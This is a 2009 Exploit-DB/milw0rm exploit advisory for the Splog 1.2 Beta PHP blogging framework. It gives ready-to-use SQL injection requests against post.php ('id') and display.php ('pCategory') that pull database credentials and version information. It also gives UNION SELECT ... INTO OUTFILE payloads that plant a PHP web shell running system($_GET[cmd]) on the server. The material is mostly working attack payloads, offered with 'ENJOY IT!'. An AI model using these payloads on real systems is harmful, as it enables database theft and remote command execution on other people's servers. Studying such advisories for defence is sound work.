Splog <= 1.2 Beta - Multiple Remote SQL Injection Vulnerabilities

2009-06-11T00:00:00
ID EDB-ID:8929
Type exploitdb
Reporter YEnH4ckEr
Modified 2009-06-11T00:00:00

Description

Splog <= 1.2 Beta Multiple Remote SQL Injection Vulnerabilities. Webapps exploit for php platform

                                        
                                            ***********************************************************************************************
***********************************************************************************************
**	       										     **
**  											     **
**     [] [] []  [][][][&gt;  []     []  [][  ][]     []   [][]]  []  [&gt;  [][][][&gt;  [][][][]    **
**     || || ||  []        [][]   []   []  []     []   []      [] []   []	 []    []    **
** [&gt;  [][][][]  [][][][&gt;  [] []  []   []  []   [][]  []       [][]    [][][][&gt;  []    []    **
**  [-----[]-----[][][][&gt;--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][&gt;--[][][][]---\ 
**==[&gt;    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  &gt;&gt;--
**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
   [&gt;   [[[]]]   [][][][&gt;  [][]   [] [][[] [[]]  [][]  [][][]  []  [&gt;  [][][][&gt; &lt;][]   []    **
**							                                     **
**    											     **
**                          ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O                      **
**					¡PROUD TO BE SPANISH!				     **
**											     **
***********************************************************************************************
***********************************************************************************************

----------------------------------------------------------------------------------------------
|       	   	     MULTIPLE SQL INJECTION VULNERABILITIES	             	     |
|--------------------------------------------------------------------------------------------|
|                                 |   Splog &lt;= v-1.2 Beta    |		    	             |
|  CMS INFORMATION:          	   --------------------------	               	             |
|										             |
|--&gt;WEB: http://sourceforge.net/projects/splog/				       		     |
|--&gt;DOWNLOAD: http://sourceforge.net/projects/splog/			                     |
|--&gt;DEMO: N/A										     |
|--&gt;CATEGORY: CMS / Blogging								     |
|--&gt;DESCRIPTION: Splog is a simple PHP and MySQL blogging framework allowing                 |
|		full integration into a website by being designed for use...                 |
|--&gt;RELEASED: 2009-06-01								     |
|											     |
|  CMS VULNERABILITY:									     |
|											     |
|--&gt;TESTED ON: firefox 3						                     |
|--&gt;DORK: N/A									             |
|--&gt;CATEGORY: SQL INJECTION							             |
|--&gt;AFFECT VERSION: &lt;= 1.2-Beta (Checked previous versions are also vulns)		     |
|--&gt;Discovered Bug date: 2009-06-08							     |
|--&gt;Reported Bug date: 2009-06-09							     |
|--&gt;Fixed bug date: 2009-06-10								     |
|--&gt;Info patch(1.3): http://sourceforge.net/projects/splog/				     |
|--&gt;Author: YEnH4ckEr									     |
|--&gt;mail: y3nh4ck3r[at]gmail[dot]com							     |
|--&gt;WEB/BLOG: N/A									     |
|--&gt;COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
|--&gt;EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)			     |
----------------------------------------------------------------------------------------------


#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


-------------------
PROOF OF CONCEPT:
-------------------


&lt;&lt;&lt;&lt;---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++---------&gt;&gt;&gt;&gt;



[++] GET var --&gt; 'id'

[++] File vuln --&gt; 'post.php'


~~~&gt; http://[HOST]/[PATH]/post.php?id=-1+UNION+SELECT+1,user(),database(),version(),user(),database()%23



&lt;&lt;&lt;&lt;---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++---------&gt;&gt;&gt;&gt;


[++] POST var --&gt; 'pCategory'

[++] File vuln --&gt; 'display.php'


POST http://[HOST]/[PATH]/display.php HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Referer: http://[HOST]/[PATH]/display.php
Content-Type: application/x-www-form-urlencoded
pCategory=-1'+UNION+SELECT+1,2,3,4,5,6# &lt;--- INJECTION


[++[Return]++] ~~~~~&gt; user, version or database.


----------
EXPLOIT:
----------


&lt;&lt;&lt;&lt;---------++++++++++++++ Extra-Condition: privileges to create files +++++++++++++++++---------&gt;&gt;&gt;&gt;


[GET]~~~~~&gt; http://[HOST]/[PATH]/post.php?id=-1+UNION+ALL+SELECT+'&lt;HTML&gt;&lt;title&gt;SPLOG &lt;= 1.2 Beta--SHELL BY --Y3NH4CK3R--&gt;&lt;/title&gt;','&lt;body text=ffffff bgcolor=000000&gt;&lt;center&gt;&lt;h1&gt;YOUR SHELL IS ON!&lt;br&gt;','&lt;/h1&gt;&lt;/center&gt;&lt;br&gt;&lt;br&gt;&lt;font color=ff0000&gt;&lt;h2&gt;Get var (cmd) to execute comands. Enjoy it!&lt;/h2&gt;','&lt;/font&gt;&lt;h3&gt;Command Result:&lt;/h3&gt;&lt;?php system($_GET[cmd]); ?&gt;','&lt;br&gt;&lt;br&gt;&lt;font color=ff0000&gt;','&lt;h3&gt;By y3nh4ck3r. Contact: y3nh4ck3r@gmail.com&lt;/h3&gt;&lt;/font&gt;&lt;/body&gt;&lt;/HTML&gt;'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'%23

[POST]~~~~~&gt;

POST http://[HOST]/[PATH]/display.php HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Referer: http://[HOST]/[PATH]/display.php
Content-Type: application/x-www-form-urlencoded
pCategory=-1'+UNION+ALL+SELECT+'&lt;HTML&gt;&lt;title&gt;SPLOG &lt;= 1.2 Beta--SHELL BY --Y3NH4CK3R--&gt;&lt;/title&gt;','&lt;body text=ffffff bgcolor=000000&gt;&lt;center&gt;&lt;h1&gt;YOUR SHELL IS ON!&lt;br&gt;','&lt;/h1&gt;&lt;/center&gt;&lt;br&gt;&lt;br&gt;&lt;font color=ff0000&gt;&lt;h2&gt;Get var (cmd) to execute comands. Enjoy it!&lt;/h2&gt;','&lt;/font&gt;&lt;h3&gt;Command Result:&lt;/h3&gt;&lt;?php system($_GET[cmd]); ?&gt;','&lt;br&gt;&lt;br&gt;&lt;font color=ff0000&gt;','&lt;h3&gt;By y3nh4ck3r. Contact: y3nh4ck3r@gmail.com&lt;/h3&gt;&lt;/font&gt;&lt;/body&gt;&lt;/HTML&gt;'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'# &lt;--- INJECTION


[++[Return]++] ~~~~~&gt; Your shell in http://[HOST]/[PATH]/shell.php



&lt;&lt;&lt;-----------------------------EOF----------------------------------&gt;&gt;&gt;ENJOY IT!



##############################################################################
##############################################################################
##**************************************************************************##
##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!         ##
##**************************************************************************##
##--------------------------------------------------------------------------##
##**************************************************************************##
## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
##**************************************************************************##
##############################################################################
##############################################################################

# milw0rm.com [2009-06-11]